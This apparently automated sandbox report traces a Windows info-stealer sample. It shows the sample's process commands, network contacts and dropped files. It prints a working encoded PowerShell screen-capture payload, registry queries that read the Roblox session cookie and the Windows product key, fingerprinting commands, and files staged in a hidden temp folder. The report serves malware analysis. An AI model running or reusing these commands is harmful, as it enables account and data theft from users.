powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lojle10l\lojle10l.cmdline"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD32E.tmp" "c:\Users\Admin\AppData\Local\Temp\lojle10l\CSCC2FF8CFCF8194165BEA0632CE55CF0DC.TMP"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "getmac"

C:\Windows\system32\getmac.exe

getmac

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

Network

Country Destination Domain Proto
US 8.8.8.8:53 gstatic.com udp
GB 142.250.200.35:443 gstatic.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discordapp.com udp
US 162.159.135.233:443 discordapp.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 233.135.159.162.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 10.27.171.150.in-addr.arpa udp
US 8.8.8.8:53 1.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI6242\python310.dll

MD5 63a1fa9259a35eaeac04174cecb90048
SHA1 0dc0c91bcd6f69b80dcdd7e4020365dd7853885a
SHA256 14b06796f288bc6599e458fb23a944ab0c843e9868058f02a91d4606533505ed
SHA512 896caa053f48b1e4102e0f41a7d13d932a746eea69a894ae564ef5a84ef50890514deca6496e915aae40a500955220dbc1b1016fe0b8bcdde0ad81b2917dea8b

C:\Users\Admin\AppData\Local\Temp\_MEI6242\VCRUNTIME140.dll

MD5 f34eb034aa4a9735218686590cba2e8b
SHA1 2bc20acdcb201676b77a66fa7ec6b53fa2644713
SHA256 9d2b40f0395cc5d1b4d5ea17b84970c29971d448c37104676db577586d4ad1b1
SHA512 d27d5e65e8206bd7923cf2a3c4384fec0fc59e8bc29e25f8c03d039f3741c01d1a8c82979d7b88c10b209db31fbbec23909e976b3ee593dc33481f0050a445af

C:\Users\Admin\AppData\Local\Temp\_MEI6242\base_library.zip

MD5 63e0846ec004e65893712d60d42c6545
SHA1 c0c6757de21929c721e525b2c2eeb786558b7ac3
SHA256 64273eea78d63745e5cb85fdcf6808917cd19c4b21f8f1c0fd5a0606c422f01d
SHA512 85b6a1830f4410fbe95aa9e166337120ee9e0b60a49eaeed104fe52c2c6f2518d8392475cea23a8972edb6113f4af00a165a1df78440dfae7055c51ee85d68f1

C:\Users\Admin\AppData\Local\Temp\_MEI6242\_ctypes.pyd

MD5 1635a0c5a72df5ae64072cbb0065aebe
SHA1 c975865208b3369e71e3464bbcc87b65718b2b1f
SHA256 1ea3dd3df393fa9b27bf6595be4ac859064cd8ef9908a12378a6021bba1cb177
SHA512 6e34346ea8a0aacc29ccd480035da66e280830a7f3d220fd2f12d4cfa3e1c03955d58c0b95c2674aea698a36a1b674325d3588483505874c2ce018135320ff99

C:\Users\Admin\AppData\Local\Temp\_MEI6242\python3.DLL

MD5 fd4a39e7c1f7f07cf635145a2af0dc3a
SHA1 05292ba14acc978bb195818499a294028ab644bd
SHA256 dc909eb798a23ba8ee9f8e3f307d97755bc0d2dc0cb342cedae81fbbad32a8a9
SHA512 37d3218bc767c44e8197555d3fa18d5aad43a536cfe24ac17bf8a3084fb70bd4763ccfd16d2df405538b657f720871e0cd312dfeb7f592f3aac34d9d00d5a643

C:\Users\Admin\AppData\Local\Temp\_MEI6242\_hashlib.pyd

MD5 d4674750c732f0db4c4dd6a83a9124fe
SHA1 fd8d76817abc847bb8359a7c268acada9d26bfd5
SHA256 caa4d2f8795e9a55e128409cc016e2cc5c694cb026d7058fc561e4dd131ed1c9
SHA512 97d57cfb80dd9dd822f2f30f836e13a52f771ee8485bc0fd29236882970f6bfbdfaac3f2e333bba5c25c20255e8c0f5ad82d8bc8a6b6e2f7a07ea94a9149c81e

C:\Users\Admin\AppData\Local\Temp\_MEI6242\_ssl.pyd

MD5 7910fb2af40e81bee211182cffec0a06
SHA1 251482ed44840b3c75426dd8e3280059d2ca06c6
SHA256 d2a7999e234e33828888ad455baa6ab101d90323579abc1095b8c42f0f723b6f
SHA512 bfe6506feb27a592fe9cf1db7d567d0d07f148ef1a2c969f1e4f7f29740c6bb8ccf946131e65fe5aa8ede371686c272b0860bd4c0c223195aaa1a44f59301b27

C:\Users\Admin\AppData\Local\Temp\_MEI6242\pyarmor_runtime_007011\pyarmor_runtime.pyd

MD5 8c8bab72979c2b206975f4c31dca29f6
SHA1 af718ef4bd61b8435bd353dc751b9fe19a73a65c
SHA256 c0b0f9551d29c280be45717ef5ea075165fdd7a49557198efe76be0cee80ce30
SHA512 c7237f9e404700e37b5d7883fb8c05067ce7274cc04b8bf1082153d36ce33a57c5a9d8e7c6209a02d593e5371fedbe8f5b7aa7edd449f012c7ae95440f219bbe

C:\Users\Admin\AppData\Local\Temp\_MEI6242\_sqlite3.pyd

MD5 5279d497eee4cf269d7b4059c72b14c2
SHA1 aff2f5de807ae03e599979a1a5c605fc4bad986e
SHA256 b298a44af162be7107fd187f04b63fb3827f1374594e22910ec38829da7a12dc
SHA512 20726fc5b46a6d07a3e58cdf1bed821db57ce2d9f5bee8cfd59fce779c8d5c4b517d3eb70cd2a0505e48e465d628a674d18030a909f5b73188d07cc80dcda925

C:\Users\Admin\AppData\Local\Temp\_MEI6242\_socket.pyd

MD5 819166054fec07efcd1062f13c2147ee
SHA1 93868ebcd6e013fda9cd96d8065a1d70a66a2a26
SHA256 e6deb751039cd5424a139708475ce83f9c042d43e650765a716cb4a924b07e4f
SHA512 da3a440c94cb99b8af7d2bc8f8f0631ae9c112bd04badf200edbf7ea0c48d012843b4a9fb9f1e6d3a9674fd3d4eb6f0fa78fd1121fad1f01f3b981028538b666

C:\Users\Admin\AppData\Local\Temp\_MEI6242\_queue.pyd

MD5 d8c1b81bbc125b6ad1f48a172181336e
SHA1 3ff1d8dcec04ce16e97e12263b9233fbf982340c
SHA256 925f05255f4aae0997dc4ec94d900fd15950fd840685d5b8aa755427c7422b14
SHA512 ccc9f0d3aca66729832f26be12f8e7021834bbee1f4a45da9451b1aa5c2e63126c0031d223af57cf71fad2c85860782a56d78d8339b35720194df139076e0772

C:\Users\Admin\AppData\Local\Temp\_MEI6242\_bz2.pyd

MD5 86d1b2a9070cd7d52124126a357ff067
SHA1 18e30446fe51ced706f62c3544a8c8fdc08de503
SHA256 62173a8fadd4bf4dd71ab89ea718754aa31620244372f0c5bbbae102e641a60e
SHA512 7db4b7e0c518a02ae901f4b24e3860122acc67e38e73f98f993fe99eb20bb3aa539db1ed40e63d6021861b54f34a5f5a364907ffd7da182adea68bbdd5c2b535

C:\Users\Admin\AppData\Local\Temp\_MEI6242\_lzma.pyd

MD5 7447efd8d71e8a1929be0fac722b42dc
SHA1 6080c1b84c2dcbf03dcc2d95306615ff5fce49a6
SHA256 60793c8592193cfbd00fd3e5263be4315d650ba4f9e4fda9c45a10642fd998be
SHA512 c6295d45ed6c4f7534c1a38d47ddc55fea8b9f62bbdc0743e4d22e8ad0484984f8ab077b73e683d0a92d11bf6588a1ae395456cfa57da94bb2a6c4a1b07984de

C:\Users\Admin\AppData\Local\Temp\_MEI6242\sqlite3.dll

MD5 914925249a488bd62d16455d156bd30d
SHA1 7e66ba53f3512f81c9014d322fcb7dd895f62c55
SHA256 fbd8832b5bc7e5c9adcf7320c051a67ee1c33fd198105283058533d132785ab4
SHA512 21a468929b15b76b313b32be65cfc50cad8f03c3b2e9bf11ca3b02c88a0482b7bc15646ce40df7fb42fbc96bd12362a54cffe0563c4ddc3fc78622622c699186

C:\Users\Admin\AppData\Local\Temp\_MEI6242\select.pyd

MD5 a653f35d05d2f6debc5d34daddd3dfa1
SHA1 1a2ceec28ea44388f412420425665c3781af2435
SHA256 db85f2f94d4994283e1055057372594538ae11020389d966e45607413851d9e9
SHA512 5aede99c3be25b1a962261b183ae7a7fb92cb0cb866065dc9cd7bb5ff6f41cc8813d2cc9de54670a27b3ad07a33b833eaa95a5b46dad7763ca97dfa0c1ce54c9

C:\Users\Admin\AppData\Local\Temp\_MEI6242\_decimal.pyd

MD5 20c77203ddf9ff2ff96d6d11dea2edcf
SHA1 0d660b8d1161e72c993c6e2ab0292a409f6379a5
SHA256 9aac010a424c757c434c460c3c0a6515d7720966ab64bad667539282a17b4133
SHA512 2b24346ece2cbd1e9472a0e70768a8b4a5d2c12b3d83934f22ebdc9392d9023dcb44d2322ada9edbe2eb0e2c01b5742d2a83fa57ca23054080909ec6eb7cf3ca

C:\Users\Admin\AppData\Local\Temp\_MEI6242\unicodedata.pyd

MD5 81d62ad36cbddb4e57a91018f3c0816e
SHA1 fe4a4fc35df240b50db22b35824e4826059a807b
SHA256 1fb2d66c056f69e8bbdd8c6c910e72697874dae680264f8fb4b4df19af98aa2e
SHA512 7d15d741378e671591356dfaad4e1e03d3f5456cbdf87579b61d02a4a52ab9b6ecbffad3274cede8c876ea19eaeb8ba4372ad5986744d430a29f50b9caffb75d

C:\Users\Admin\AppData\Local\Temp\_MEI6242\libssl-1_1.dll

MD5 bec0f86f9da765e2a02c9237259a7898
SHA1 3caa604c3fff88e71f489977e4293a488fb5671c
SHA256 d74ce01319ae6f54483a19375524aa39d9f5fd91f06cf7df238ca25e043130fd
SHA512 ffbc4e5ffdb49704e7aa6d74533e5af76bbe5db297713d8e59bd296143fe5f145fbb616b343eed3c48eceaccccc2431630470d8975a4a17c37eafcc12edd19f4

C:\Users\Admin\AppData\Local\Temp\_MEI6242\libcrypto-1_1.dll

MD5 9d7a0c99256c50afd5b0560ba2548930
SHA1 76bd9f13597a46f5283aa35c30b53c21976d0824
SHA256 9b7b4a0ad212095a8c2e35c71694d8a1764cd72a829e8e17c8afe3a55f147939
SHA512 cb39aa99b9d98c735fdacf1c5ed68a4d09d11f30262b91f6aa48c3f8520eff95e499400d0ce7e280ca7a90ff6d7141d2d893ef0b33a8803a1cadb28ba9a9e3e2

C:\Users\Admin\AppData\Local\Temp\_MEI6242\libffi-7.dll

MD5 eef7981412be8ea459064d3090f4b3aa
SHA1 c60da4830ce27afc234b3c3014c583f7f0a5a925
SHA256 f60dd9f2fcbd495674dfc1555effb710eb081fc7d4cae5fa58c438ab50405081
SHA512 dc9ff4202f74a13ca9949a123dff4c0223da969f49e9348feaf93da4470f7be82cfa1d392566eaaa836d77dde7193fed15a8395509f72a0e9f97c66c0a096016

C:\Users\Admin\AppData\Local\Temp\_MEI6242\zstandard\backend_c.cp310-win_amd64.pyd

MD5 ee146c36c6f83a972594c2621e34212d
SHA1 71f41b8f4b779060fc96de58122e6c184cbe259c
SHA256 4378881d850bc5796f2d66f7689e7966915b11dfd9130449137fbcb61c296b84
SHA512 2964939a0091ffd3b0ec85afab65d6b447af8fc09e39d9f655f1fb0edaaa52b9b5cb8258b4621b787e787b9b1eccc53335ca83090be7d4739d77340dc31e46b1

memory/4848-64-0x00007FFC03343000-0x00007FFC03345000-memory.dmp

memory/4848-65-0x00007FFC03340000-0x00007FFC03E01000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yysnds2x.ab5.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4848-81-0x0000027FC1970000-0x0000027FC1992000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 62623d22bd9e037191765d5083ce16a3
SHA1 4a07da6872672f715a4780513d95ed8ddeefd259
SHA256 95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010
SHA512 9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

\??\c:\Users\Admin\AppData\Local\Temp\lojle10l\lojle10l.cmdline

MD5 f7a4353c31050804aeabbd5396658b8e
SHA1 79425cc1e9ff0ef6ec801440f32be88665c1ac45
SHA256 8b40b068a69ccea92ff5d8204119de2c864141c005e50fabfd6d208e46ab7773
SHA512 1892a62b809052afd32879c857ed3a437b0917a86c0b22dd16d95526a738b4f74c1423f3596bc827fb816b4303b7a71c3fdfd00050dee0cb8a0fecdca3e1cd8e

\??\c:\Users\Admin\AppData\Local\Temp\lojle10l\lojle10l.0.cs

MD5 c76055a0388b713a1eabe16130684dc3
SHA1 ee11e84cf41d8a43340f7102e17660072906c402
SHA256 8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7
SHA512 22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

\??\c:\Users\Admin\AppData\Local\Temp\lojle10l\CSCC2FF8CFCF8194165BEA0632CE55CF0DC.TMP

MD5 c5846502781f982769ece7d6afe19717
SHA1 15bf54fe129de5415c1f2ee245889af40f304041
SHA256 15b5c7fc9c9d41aadaa42189a7b6dda8aa309311a4499324068afb1b2401d36b
SHA512 1baa0760181f4ff663178d38e273d5305a3ea2f417c943d1dab6fd84d1932c0bf2aa6a8463fbb366a18e2bc44c72858102ebb5898c6371f2668fcd0e6c085691

C:\Users\Admin\AppData\Local\Temp\RESD32E.tmp

MD5 3279c2d442b128d31910eb49c6c0de41
SHA1 38a09922b1aac4940fe75a67d7e8f6352d231877
SHA256 59b5827e9de5d9164bf97e012cd73f64666fa63a7149197200b4da2b7bf992c3
SHA512 84e97dc80518668f9ab7b0fa418c0843e1d947673959ddb30ef4315c049dc0f629c99cb0913848fd6d3c77f1babc7762246b3bc4f76065b37b2f0eaa8f9e3a9e

memory/4604-184-0x00000165BD6B0000-0x00000165BD6B8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\lojle10l\lojle10l.dll

MD5 0fbc8826e8d19a65891225b8ae2c94ac
SHA1 55f0a950b4bc03005fcb40fea30c71939ca99582
SHA256 f46420f991b594ecd9b0e00f1d47855c00c229b7fa2a6a8a0a4ffeea69387e8a
SHA512 45fd6eae4f68843f9461bc29085429ec85f9896c6a09d6bcc3bc7deb55bcf0981369967e8f33ccaf5cbdbb23e37cdd8cab476f965ca0890cbb649019f54ba618

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d28a889fd956d5cb3accfbaf1143eb6f
SHA1 157ba54b365341f8ff06707d996b3635da8446f7
SHA256 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA512 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

memory/4848-188-0x00007FFC03340000-0x00007FFC03E01000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7501b957609b244cbd89b29c26443ffb
SHA1 554b181404b94a7baefbd0219195bd67d17f4794
SHA256 a7178081fdfd14852f143505399efb91273be5d86b35916a9fc13f53b5a6c3f8
SHA512 31ffc7c3feb5b3203da326ab667db3080fadb0d06a8328365d49654a0d1f7061b583fd328a59cda4ea97c6be2fbea2da3a0cca97ec0bbdd6d105ed2e3136c8d0

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a291ad5daa71a8fb81c94551b1552963
SHA1 85a37f5e0e28536df3c9a5b84ed2b4b46de0a34d
SHA256 2cb80d42b78ddaeb182dc6c8dfebb0968908173bbfc8261f172ab60a1278e192
SHA512 c2faac85da8bc488d6642b7484107e167f378ca7890a7d40134f4df583a97c3b4e53bd5c133a77a2d1f3bc36a4f55ef87378993da12e424c150ccba3586ffcfe

C:\Users\Admin\AppData\Local\Temp\‏ ‌‎ ‍ ‎ ‎\Display (1).png

MD5 152b41cb3a9691e11fa43fd0405ede91
SHA1 bd958f14daf02ea8eb018e9d96ba13911983c974
SHA256 380efdf5d38774286679b118784af60b9247b09548e6a382d555bd76aeaed599
SHA512 7bb55134d073f78379c5502b51e3deb8220b1f6013b49e254bd7eafa43c5f57b763940893a59f5a406dcc0da07d41926a5de1ca002d064792c5414b8cd22c582

C:\Users\Admin\AppData\Local\Temp\‏ ‌‎ ‍ ‎ ‎\Common Files\Desktop\ImportBackup.mpeg

MD5 c013624491d2db6ce0c9ebffdf0ac6f8
SHA1 5c7819ccf9bd4c3f280b53a3decda034db8b2308
SHA256 e402e1317cfd28757caedb6e2cb9892723f766e253cc711f7d123d81fcc5ca74
SHA512 8b277e13d258ad1448f3819e5376f245f70075d6d3932108e9b0b593e9306560766746cf24cad6fc950257d073f4cd32a2ecbae90da17fe83e31f78509ce79ef

C:\Users\Admin\AppData\Local\Temp\‏ ‌‎ ‍ ‎ ‎\Common Files\Desktop\ConfirmBackup.xml

MD5 adb99744ad67e99331673db15e27d4d3
SHA1 10b66f28e7eeda0c786154eda9e1c7cc47b4d76d
SHA256 e37e7dea4b20169b4fbb8ed66814824ab8905b242a0d4292527f320a511b4c38
SHA512 d2d97aa101a678d6439dfd53017d6ea7fd21b024124fde451cebc792a9b430bd2422740174cdc2ca643423aa2b4d57acc286f703bad30605982576b9e95e91f7

C:\Users\Admin\AppData\Local\Temp\‏ ‌‎ ‍ ‎ ‎\Common Files\Desktop\AddReceive.xlsx

MD5 586f68efe9e5f4747fc82a90bcd92f2d
SHA1 716b7a72146fd28fed9c362e27b3afdaef6af4de
SHA256 2801bae9f696170480462730f3e0c7342cd0a1da99e3df85455eba794dac1dd7
SHA512 37c0d2582317fbccc6a29912adfe3627be1a5c467f1e21c2ed8a87123234f962bffca5a908286e3fc1f1f1b7f35db29447b74fb1558257e6871e397d76dce0ea

C:\Users\Admin\AppData\Local\Temp\‏ ‌‎ ‍ ‎ ‎\Common Files\Documents\EditAdd.docx

MD5 a8ebf0851211865d08199ab06c80d4bf
SHA1 66e0f343c559c589020c7c2a05abcd6a78f648f8
